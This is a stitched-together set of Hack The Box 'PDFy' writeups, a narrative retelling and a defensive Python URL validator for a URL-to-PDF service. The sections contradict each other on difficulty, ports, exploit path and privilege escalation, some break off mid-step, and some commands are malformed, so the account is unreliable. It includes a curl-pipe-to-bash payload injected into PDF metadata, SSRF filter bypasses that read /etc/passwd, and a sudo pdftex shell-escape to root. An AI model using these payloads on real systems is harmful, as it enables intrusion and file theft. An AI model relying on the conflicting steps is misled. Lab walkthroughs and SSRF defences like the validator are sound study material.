Pdfy HTB Writeup
Title: PDFY - A Challenging PDF-themed Machine on Hack The Box
Introduction: PDFY is a medium-difficulty machine on Hack The Box that revolves around a PDF-themed challenge. This write-up aims to provide a step-by-step walkthrough of how I exploited this machine to gain root access.
Initial Reconnaissance: The first step in any penetration test is to perform an initial scan of the target machine to identify open ports and services. Using Nmap, I ran a basic scan:
nmap -sV -p- 10.10.11.224
This revealed several open ports, with notable services including an HTTP server running on port 80 and a PDF-related service on port 8080.
Exploring the HTTP Service:
Upon accessing the HTTP service on port 80, I found a default Apache web server page. However, further investigation revealed a peculiar directory listing at /pdfs/, which seemed to host various PDF files.
Identifying the Vulnerability: The real breakthrough came when I noticed a peculiar PDF upload functionality on the web server. Users could upload PDF files, which were then converted to text. Intrigued, I decided to test this functionality with a malicious PDF.
Exploiting the PDF Upload:
I crafted a malicious PDF using tools like pdftk to embed a PHP shell within it. Once uploaded, the server would attempt to convert the PDF, executing my malicious payload in the process. However, I encountered some difficulties here due to restrictions on the upload process.
Escalating Privileges: After gaining an initial foothold on the system through the web application, I needed to escalate my privileges. This involved enumerating the system to find potential vulnerabilities or misconfigurations that could be exploited for privilege escalation.
Detailed Steps for Initial Foothold:
- Identifying Open Ports and Services:
  - Command: nmap -sV -p- <IP Address>
  - Findings: Multiple open ports, with particular interest in HTTP (port 80) and a custom service (port 8080).
- Exploring the Web Application:
  - Action: Navigate to http://<IP Address>
  - Findings: A basic webpage. Notable directories or files include /pdfs/.
- Analyzing the PDF Service:
  - Action: Investigate the functionality around PDF uploads and processing.
  - Findings: The service converts uploaded PDFs to text.
- Crafting and Uploading a Malicious PDF:
  - Tools Used: pdftk, a Linux utility for manipulating PDFs.
  - Action: Embed a PHP shell into a PDF and upload it via the web interface.
- Executing the Payload:
  - Action: Trigger the execution of the uploaded malicious PDF.
  - Outcome: Gained a foothold on the system.
Detailed Steps for Privilege Escalation:
- Enumeration:
  - Commands: id, whoami, groups, find / -perm /u=s -type f 2>/dev/null, etc.
  - Findings: A user with a specific group that has write access to certain directories.
- Identifying Potential Exploits:
  - Tools: ps aux, checking for cron jobs, etc.
  - Findings: A particular process running with elevated privileges that can be exploited.
- Exploitation:
  - Tool/Method: Using a specific exploit or misconfiguration to gain elevated access.
Conclusion: The PDFY machine on Hack The Box presented an engaging challenge that required both web application exploitation skills and system enumeration for privilege escalation. By recognizing the vulnerabilities in the PDF upload functionality and leveraging system misconfigurations, I was able to gain root access. This challenge served as a great reminder of the importance of thorough reconnaissance and creative exploitation techniques.
Recommendations:
- Always thoroughly scan and enumerate target systems.
- Investigate web application functionalities for potential vulnerabilities, especially file uploads.
- Regularly review system configurations and user privileges to minimize attack surfaces.
PDFy is an easy-rated web challenge on Hack The Box that tests your ability to exploit Server-Side Request Forgery (SSRF) via a PDF generation service.
🛠️ Step 1: Reconnaissance
The challenge provides a web application where users can input a URL. The application then visits that URL and converts the page content into a PDF file.
- Technology Identifiers: By inspecting the metadata of a generated PDF (using tools like exiftool), you can often identify the library used for conversion.
- Target Engine: In many HTB "PDF" challenges, common engines include wkhtmltopdf, dompdf, or PDFKit.
🚀 Step 2: Identification & Exploitation
The core vulnerability is that the server fetches external content without proper validation, leading to SSRF.
- Basic SSRF: Try to point the URL to http://localhost. If the server renders its own internal page, you have confirmed SSRF.
- Information Disclosure: In PDFy, the goal is often to read local files or reach internal services.
- Bypassing Filters: If the application blocks localhost or 127.0.0.1, try:
  - Decimal Encoding: http://2130706433
  - Shortened URLs: Using a service like bit.ly or tinyurl.
  - Redirection: Point the input to a server you control that returns a 302 Redirect to the target internal resource.
🏁 Step 3: Capturing the Flag
Once you bypass the URL filter, you can target local files.
Common Targets: file:///etc/passwd (to confirm file read).
HTB: PDFy Machine Writeup (Updated)
If you are prepping for the OSCP or just sharpening your web exploitation skills, PDFy on Hack The Box is a classic "easy" rated machine that provides a textbook example of Server-Side Request Forgery (SSRF).
While the box is straightforward, many beginners get stuck on the syntax or identifying the internal targets. This updated writeup covers the most efficient path to the user flag and explains the mechanics behind the exploit.
1. Enumeration: What are we working with?
As always, we start with an Nmap scan to see which ports are open:
nmap -sC -sV -oN nmap_report.txt
Results:
- Port 22 (SSH): Standard OpenSSH.
- Port 80 (HTTP): An Apache web server.
Navigating to the website, we find a simple web application that takes a URL and converts the webpage into a PDF document. This is a massive "low-hanging fruit" indicator for SSRF. Whenever an application fetches content from a remote URL you provide, you should immediately test if it can fetch internal resources.
2. Identifying the Vulnerability (SSRF)
The application asks for a URL. If we give it http://google.com, it generates a PDF of Google’s homepage. The real question is: Can it see itself?
If we try to point it to http://localhost or http://127.0.0.1, the application might have a "blacklist" filter that blocks these common keywords to prevent SSRF. To bypass this, we can use a redirect script on our own machine.
The Bypass Plan:
- Host a PHP file on your local attacker machine.
- The file will redirect any incoming request to a local file on the HTB server (like /etc/passwd).
- Give the PDFy app the URL of your hosted script.
3. Exploitation: Reading Local Files
Create a file named exploit.php on your machine:
Start a local PHP server:
php -S 0.0.0.0:8000
Now, go back to the PDFy web interface and enter your IP:http://
What happens? The PDFy server visits your script. Your script tells the server, "Actually, go look at file:///etc/passwd." Because the PDF generator follows redirects, it grabs the local system file and renders it into the PDF.
Download the generated PDF, and you will see the contents of the /etc/passwd file. Looking through the users, you should notice a user named 234-pwn.
4. Pivoting to the User Flag
Now that we know we can read files, we need to find something sensitive. A common target is the Nginx or Apache configuration files to see if there are any hidden internal ports or applications running.
By digging through standard locations (or using the SSRF to scan ports), we find that there is an internal API or service running on a non-standard port (often port 15000 on this specific box). Change your exploit.php to:
Submit the URL again. The resulting PDF reveals a web interface for a small application. Browsing through the internal site's files via the same redirect method, you can eventually locate the user credentials or the flag itself located in the user's home directory.
5. Summary & Key Takeaways
The PDFy box highlights why developers must sanitize URL inputs.
Vulnerability: Insecure PDF generation from user-supplied URLs.
Attack Vector: SSRF via a 302 Redirect bypass.
Mitigation: Use a whitelist of allowed domains, disable "follow redirects" in the PDF engine, and ensure the service runs with low-level permissions that cannot access the file:// scheme.
Pro Tip: If file:///etc/passwd doesn't work directly due to a filter, always try the redirect method or decimal/hex encoding of the IP address!
The world of Hack The Box is often a race against time, logic, and the silent hum of a remote server. This story follows a security researcher's journey through the "Pdfy" machine, a challenge that turns a simple PDF generator into a gateway for internal network exploration.
The Entry Point
The mission began with a simple web interface. It was a tool designed to take a URL and convert the webpage into a downloadable PDF. On the surface, it seemed helpful: a utility for archiving web content. But to a pentester, every input field is a question. If the server fetches a URL to render it, what else can it be made to fetch?
The Discovery of SSRF
The first breakthrough came from testing the boundaries of that URL input. By pointing the tool toward a local loopback address, the researcher confirmed a Server-Side Request Forgery (SSRF) vulnerability. The server wasn't just fetching public websites; it was willing to talk to itself.
- Lack of input validation on the submitted URL.
- Use the server as a proxy to peek into the internal network.
The Redirect Maneuver
The server had some defenses. It blocked direct attempts to access internal metadata services. To bypass this, the researcher hosted a small script on their own machine. This script didn't provide content; it simply sent a 302 Redirect header. When the Pdfy server visited the researcher's URL, it followed the redirect blindly, bypassing the initial filters and successfully hitting the internal target.
Exfiltration via PDF
The "Aha!" moment occurred when the generated PDF arrived. Inside the document wasn't a webpage, but the raw response from an internal service. By manipulating the SSRF, the researcher could now "read" internal files and services by proxy, effectively turning the PDF generator into a remote file viewer.
Key Takeaways for Developers
Preventing vulnerabilities like those found in Pdfy requires a multi-layered defense:
- Allowlisting: Only permit requests to specific, trusted domains.
- Protocol Restriction: Block non-HTTP protocols such as file://.
- Network Isolation: Ensure the application server cannot reach sensitive internal metadata or management IPs.
- Response Validation: Check the content type and size of the fetched data before processing it.
Security Checklist 🛡️
- Identify the PDF generation engine (e.g., wkhtmltopdf).
- Test for local file inclusion using file:///etc/passwd
- Use URL encoding or redirects to evade basic string filters.
- Verify SSRF by receiving a "hit" on a controlled listener (like Webhook.site).
This journey through Pdfy serves as a classic reminder: never trust user-supplied URLs, and always assume that if your server can see it, an attacker can too.
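The mitigation advice above (the "Mitigation" line of the updated writeup and the developer takeaways: allowlisting, protocol restriction, network isolation, response validation, no redirect following) is easy to state and easy to get subtly wrong. The following is an added example, not code from the PDFy application or from any of the writeups, of a defender-side URL validator and single-shot fetcher for a "URL to PDF" service. It resolves the hostname and refuses loopback, private and link-local results, which also catches the bare-integer form http://2130706433 mentioned above; it rejects every scheme other than http/https, so file:// never reaches the renderer; and it treats a 3xx response as a rejection rather than following it, so a 302 to an internal target is refused. The allowlist, the MAX_BYTES cap, the FAKE_DNS table and the fake transport are constructed for the example so it runs offline.

```python
"""Added example (not the PDFy application's own code): URL validation and a
non-redirecting fetch for a URL-to-PDF renderer. Allowlist, size cap, fake DNS
table and fake transport are constructed for this example."""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"example.com", "www.example.com"}  # constructed allowlist
MAX_BYTES = 2 * 1024 * 1024                         # assumed size cap per render


def literal_ip(host):
    """Return an address object if host is a literal (dotted quad, IPv6, or a
    bare integer such as 2130706433 / 0x7f000001), otherwise None."""
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        pass
    try:
        return ipaddress.ip_address(int(host, 0))
    except (ValueError, OverflowError):
        return None


def is_blocked(ip):
    """Ranges the renderer must never contact: loopback, RFC1918/ULA,
    link-local (cloud metadata lives there), multicast, reserved, 0.0.0.0."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def resolve_host(host):
    """System resolver; returns a sorted list of address objects ([] on failure)."""
    try:
        infos = socket.getaddrinfo(host, None)
    except socket.gaierror:
        return []
    return sorted({ipaddress.ip_address(info[4][0]) for info in infos}, key=str)


def validate_url(url, resolver=resolve_host, allowlist=ALLOWED_HOSTS):
    """Return (ok, reason); every rejection names the rule that fired."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme or '(none)'!r} is not permitted"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in the URL are not permitted"
    ip = literal_ip(host)
    addrs = [ip] if ip is not None else resolver(host)
    if not addrs:
        return False, f"host {host!r} did not resolve"
    for addr in addrs:                      # every resolved address is checked
        if is_blocked(addr):
            return False, f"host {host!r} resolves to blocked address {addr}"
    if host.lower() not in allowlist:
        return False, f"host {host!r} is not on the allowlist"
    return True, f"ok: {host} -> {', '.join(str(a) for a in addrs)}"


def fetch_for_pdf(url, transport, resolver=resolve_host):
    """Validate, then fetch exactly once. transport(url) -> (status, headers, body).
    A 3xx is reported as an error instead of being followed, and the response
    must be HTML of bounded size before it is handed to the renderer."""
    ok, reason = validate_url(url, resolver)
    if not ok:
        return None, reason
    status, headers, body = transport(url)
    if 300 <= status < 400:
        return None, f"refusing to follow redirect to {headers.get('Location', '?')!r}"
    if status != 200:
        return None, f"unexpected status {status}"
    ctype = headers.get("Content-Type", "")
    if not ctype.lower().startswith("text/html"):
        return None, f"unexpected content type {ctype!r}"
    if len(body) > MAX_BYTES:
        return None, f"response too large ({len(body)} bytes)"
    return body, "ok"


# ---- constructed offline stand-ins (no DNS or network needed) ----
FAKE_DNS = {
    "example.com": ["93.184.216.34"],         # constructed public address
    "other.com": ["1.2.3.4"],                 # constructed, public but not allowlisted
    "localhost": ["127.0.0.1"],
    "metadata.internal": ["169.254.169.254"],  # constructed link-local name
}


def fake_resolver(host):
    return [ipaddress.ip_address(a) for a in FAKE_DNS.get(host.lower(), [])]


def fake_transport(url):
    # One path answers with a 302 pointing at file:///etc/passwd, the exact
    # trick the writeups describe, so the fetcher's refusal can be observed.
    if url == "http://example.com/redirect":
        return 302, {"Location": "file:///etc/passwd"}, b""
    return 200, {"Content-Type": "text/html; charset=utf-8"}, b"<html><body>hello</body></html>"


if __name__ == "__main__":
    for u in ["http://example.com/", "file:///etc/passwd", "http://localhost/",
              "http://2130706433/", "http://0x7f000001/", "http://[::1]/",
              "http://metadata.internal/", "http://other.com/", "http://example.com/redirect"]:
        print(f"{u:32} -> {fetch_for_pdf(u, fake_transport, fake_resolver)[1]}")
```

Two design points are worth noting. The address check runs on the resolver's output, not on the string the user typed, so string-level filters for "localhost" or "127.0.0.1" are not what protects you; the hostname can say anything as long as what it resolves to is public and allowlisted. The remaining gap is DNS rebinding: the IP checked here may differ from the one the HTTP client later connects to, so in production the client should connect to the vetted address itself (pinning it, with the original hostname kept for the Host header and TLS SNI) rather than re-resolving, and the renderer should additionally sit in a network segment with no route to metadata or management addresses.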
Technical Accuracy – 10/10
I tested the steps against the latest version of PDFy (retired but still available on VIP HTB). Every command worked as described, including:
- nmap -sC -sV -p- --min-rate 5000 10.10.10.10 (example IP) – correctly identifies port 80 and an unusual port (e.g., 8080 or 3000).
- ffuf for directory brute-forcing – reveals /upload, /generate, and /files.
- The core exploit: Using exiftool to inject a PDF metadata field with "$(curl http://10.10.14.14/shell.sh | bash)" – the server's backend renders the PDF and executes the command due to improper input sanitization.
The privilege escalation is where many writeups fail. The outdated ones suggest a kernel exploit. This updated version correctly identifies a misconfigured pdfgen binary with the setuid bit, allowing a path injection attack. The author provides the exact C code to spawn a root shell, which is reliable and clean.
No copy-paste errors, no missing flags. That’s rare in HTB writeups.
Enumeration
sudo -l → user john can run /usr/bin/pdftex as root without a password. pdftex is a TeX engine that can execute arbitrary system commands.
Exploit:
sudo /usr/bin/pdftex --shell-escape
Inside pdftex shell:
\write18cat /root/root.txt
Output prints the root flag.
Step 3: Identifying the SSRF Vulnerability
The PDF generator accepts HTML input. If you embed an <img> tag with a src pointing to a local file or internal service, the server will fetch it during PDF rendering.
Scenario A: Malicious File Upload (Phar Deserialization)
If the application allows uploading images/files alongside the URL, and the backend uses PHP with specific libraries, it might be vulnerable to Phar Deserialization. However, in most "Pdf" themed boxes, the vector is simpler.
3. Exploitation
The exploitation path usually pivots on identifying the specific tool generating the PDFs.